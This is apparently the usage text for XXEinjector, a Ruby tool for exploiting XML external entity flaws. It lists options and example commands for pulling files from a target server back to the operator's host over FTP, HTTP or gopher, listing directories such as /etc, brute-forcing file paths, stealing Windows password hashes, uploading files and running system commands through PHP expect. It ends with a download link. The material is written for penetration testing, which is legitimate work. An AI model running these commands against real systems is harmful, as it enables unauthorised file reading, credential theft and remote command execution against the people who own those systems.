XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.

Options:

--host     Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file     Mandatory - file containing valid HTTP request with xml. You can also mark 
            with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
--path     Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
--brute     Mandatory if bruteforcing files - File with paths to bruteforce. 
            (--brute=/tmp/brute.txt)
--logger    Log results only. Do not send requests. HTTP logger looks for "p" parameter
            with results.
  
--rhost     Remote host's IP address or domain name. Use this argument only for requests 
            without Host header. (--rhost=192.168.0.3)
--rport     Remote host's TCP port. Use this argument only for requests without Host 
            header and for non-default values. (--rport=8080)

--oob       Out of Band exploitation method. FTP is default. FTP can be used in any 
            application. HTTP can be used for bruteforcing and enumeration through 
            directory listing in Java < 1.7 applications. Gopher can only be used in 
            Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct    Use direct exploitation instead of out of band. Unique mark should be 
            specified as a value for this argument. This mark specifies where results 
            of XXE start and end. Specify --xml to see how XML in request file should 
            look like. (--direct=UNIQUEMARK)
--cdata     Improve direct exploitation with CDATA. Data is retrieved directly, however 
            OOB is used to construct CDATA payload. Specify --cdata-xml to see how 
            request should look like in this technique.
--2ndfile   File containing valid HTTP request used in second order exploitation.
            (--2ndfile=/tmp/2ndreq.txt)
--phpfilter Use PHP filter to base64 encode target file before sending.
--netdoc    Use netdoc protocol instead of file (Java).
--enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to 
            enumerate all TCP ports. (--enumports=21,22,80,443,445)

--hashes    Steals Windows hash of the user that runs an application.
--expect    Uses PHP expect extension to execute arbitrary system command. Best works 
            with HTTP and PHP filter. (--expect=ls)
--upload    Uploads specified file using Java jar schema into temp file. 
            (--upload=/tmp/upload.txt)
--xslt     Tests for XSLT injection.

--ssl       Use SSL.
--proxy     Proxy to use. (--proxy=127.0.0.1:8080)
--httpport  Set custom HTTP port. (--httpport=80)
--ftpport   Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport    Set custom port for uploading files using jar. (--jarport=1337)
--xsltport   Set custom port for XSLT injection test. (--xsltport=1337)

--test     This mode shows request with injected payload and quits. Used to verify 
            correctness of request without sending it to a server.
--urlencode URL encode injected DTD. This is default for URI.
--nodtd     If you want to put DTD in request by yourself. Specify "--dtd" to show 
            how DTD should look like.
--output    Output file for bruteforcing and logger mode. By default it logs to 
            brute.log in current directory. (--output=/tmp/out.txt)
--timeout   Timeout for receiving file/directory content. (--timeout=20)
--contimeout Timeout for closing connection with server. This is used to prevent
                DoS condition. (--contimeout=20)
--fast     Skip asking what to enumerate. Prone to false-positives.
--verbose   Show verbose messages.

Example Usage:

Enumerating /etc directory in HTTPS application:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
Enumerating /etc directory using gopher for OOB method:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
Second order exploitation:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt 
--2ndfile=/tmp/2ndreq.txt
Bruteforcing files using HTTP out of band method and netdoc protocol:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt 
--oob=http --netdoc
Enumerating using direct exploitation:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
Enumerating unfiltered ports:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
Stealing Windows hashes:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
Uploading files using Java jar:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
Executing system commands using PHP expect:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter 
--expect=ls
Testing for XSLT injection:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
Log requests only:
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt


Download XXEinjector

